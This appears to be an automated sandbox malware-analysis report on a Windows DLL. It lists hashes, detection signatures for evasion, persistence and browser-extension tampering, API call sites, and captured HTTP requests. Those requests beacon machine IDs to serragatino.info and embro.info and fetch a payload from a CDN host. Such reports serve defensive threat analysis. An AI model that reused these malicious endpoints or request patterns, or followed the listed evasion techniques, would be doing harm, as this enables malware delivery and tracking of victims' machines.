Windows Analysis Report
anuwhqTXGt.dll

Overview

General Information

Sample name: anuwhqTXGt.dll
renamed because original name is a hash value
Original sample name: 5321973ACCEA8905112E90EA77809091187252D2126ADB7F056E69A3CD1C83D3
Analysis ID: 1430161
MD5: 136233d478f9a3a8a809fc91ae7b9fa3
SHA1: 47693171dff1319486b413d384951293268d47ad
SHA256: 5321973accea8905112e90ea77809091187252d2126adb7f056e69a3cd1c83d3
Infos:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Changes security center settings (notifications, updates, antivirus, firewall)
Modifies Chrome's extension installation force list
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create an SMB header
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Modifies existing windows services
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: serragatino.info Virustotal: Detection: 9% Perma Link
Source: embro.info Virustotal: Detection: 9% Perma Link
Source: https://embro.info/installer/get_timestamp.php1023 Virustotal: Detection: 9% Perma Link
Source: https://embro.info/ Virustotal: Detection: 10% Perma Link
Source: https://embro.info/installer/finish Virustotal: Detection: 10% Perma Link
Source: https://embro.info/installer/get_timestamp.php Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: anuwhqTXGt.dll Virustotal: Detection: 11% Perma Link
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977DF30 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 33_2_0000021BD977DF30
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD977EA80 CryptDestroyHash, 33_2_0000021BD977EA80
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97D3090 CryptCreateHash, 33_2_0000021BD97D3090
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97CD5E8 CryptReleaseContext,_CxxThrowException, 33_2_0000021BD97CD5E8
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9779640 CryptReleaseContext, 33_2_0000021BD9779640
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2DF30 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 34_2_00000166D8F2DF30
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F83090 CryptCreateHash, 34_2_00000166D8F83090
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F29640 CryptReleaseContext, 34_2_00000166D8F29640
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F7D5E8 CryptReleaseContext,_CxxThrowException, 34_2_00000166D8F7D5E8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D8F2EA80 CryptDestroyHash, 34_2_00000166D8F2EA80
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85347A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam, 39_2_000001C9C85347A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 39_2_000001C9C85B1420
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C853B778 CryptReleaseContext, 39_2_000001C9C853B778
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B2B90 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B2B90
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85DCC06 CryptReleaseContext,_CxxThrowException, 39_2_000001C9C85DCC06
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AE150 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85AE150
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85346E0 CryptDestroyHash, 39_2_000001C9C85346E0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B19A0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B19A0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1950 CryptAcquireContextA,CryptCreateHash, 39_2_000001C9C85B1950
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1A30 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85B1A30
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85AE019 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 39_2_000001C9C85AE019
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85ADFC0 CryptAcquireContextA,CryptCreateHash, 39_2_000001C9C85ADFC0
Contains functionality to create an SMB header
Source: C:\Windows\System32\rundll32.exe Code function: mov dword ptr [r14+04h], 424D53FFh 39_2_000001C9C859CE00
Uses 32bit PE files
Source: anuwhqTXGt.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: anuwhqTXGt.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb$ source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: t:\untgz\MoreInfo\SRC\Release\MoreInfo.pdb source: MoreInfo.dll.7.dr, MoreInfo.dll.15.dr, MoreInfo.dll.6.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4C6B lstrcpynW,FindFirstFileW, 6_2_046A4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A30A4 FindFirstFileW,FindClose, 6_2_046A30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 6_2_046A2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C548A FindFirstFileExW, 6_2_046C548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 6_2_046B3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E4C6B lstrcpynW,FindFirstFileW, 7_2_045E4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E30A4 FindFirstFileW,FindClose, 7_2_045E30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 7_2_045E2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0460548A FindFirstFileExW, 7_2_0460548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_045F3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03452367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 15_2_03452367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034530A4 FindFirstFileW,FindClose, 15_2_034530A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03454C6B lstrcpynW,FindFirstFileW, 15_2_03454C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03463A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 15_2_03463A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0347548A FindFirstFileExW, 15_2_0347548A
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943F81C FindFirstFileExA, 33_2_0000021BD943F81C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885F81C FindFirstFileExA, 34_2_00000166D885F81C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F0510 FindFirstFileExW, 39_2_000001C9C66F0510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CAC90 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_wfullpath,_errno,_errno,_errno,_wfullpath,IsRootUNCName,GetDriveTypeW,free,__loctotime64_t,free,_wsopen_s,_fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FindClose,__wdtoxmode,GetLastError,_dosmaperr,FindClose,GetLastError,_dosmaperr,FindClose, 39_2_000001C9C85CAC90

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.67.207.72 443 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.199.40.58 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 104.21.24.192 80 Jump to behavior
Contains functionality to check if a connection to the internet is available
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8556D44 InternetCheckConnectionA,WaitForSingleObject,Sleep,WaitForSingleObject, 39_2_000001C9C8556D44
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854395&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854400&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854414&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854416&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854417&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 138.199.40.58 138.199.40.58
Source: Joe Sandbox View IP Address: 168.61.215.74 168.61.215.74
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /updateTask/index.php?v=e1.0.0.28&os_mj=10&os_mn=0&os_bitness=64&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&retry_version=1.0.0.28&retry_count=0 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: embro.infoConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 168.61.215.74
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B1FA8 getaddrinfo,socket,connect,freeaddrinfo,WSACreateEvent,WSASend,WSAGetLastError,WSAWaitForMultipleEvents,WSACreateEvent,closesocket,closesocket,closesocket,WSARecv,WSAGetLastError,WSAWaitForMultipleEvents,WSAGetLastError,WSAGetOverlappedResult,WSAResetEvent,WSACloseEvent,WSACloseEvent,WSACloseEvent,closesocket,WSACleanup,closesocket,WSACleanup, 6_2_046B1FA8
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/get_timestamp.php HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%2Cget&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%22%2C%231&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /updateTask/index.php?v=e1.0.0.28&os_mj=10&os_mn=0&os_bitness=64&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&retry_version=1.0.0.28&retry_count=0 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: embro.infoConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: embro.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854395&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /license_1.28.763.1.dat HTTP/1.1Host: 4o985rhikfsof.b-cdn.net
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854400&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854414&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854416&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: global traffic HTTP traffic detected: GET /preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854417&mid=d85294d3634ef96b9b06988fd385c922&payload= HTTP/1.1Host: serragatino.info
Source: unknown DNS traffic detected: queries for: serragatino.info
Source: rundll32.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532379164.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315274555.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1315956231.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508009358.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1344950440.0000000003226000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529625959.0000000003450000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: rundll32.exe, 00000006.00000002.1533185168.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1509281947.0000000005C4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1530276294.00000000053AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: svchost.exe, 0000000B.00000002.3167579094.000001D989118000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3166699441.000001D988887000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.dr String found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
Source: svchost.exe, 00000000.00000002.1446167098.0000026B78213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp, c23a32abd836342a70b7f6c1aa74947e.2.E.6.dr, c23a32abd836342a70b7f6c1aa74947e.2.6.dr String found in binary or memory: http://www.google.com/update2/response
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
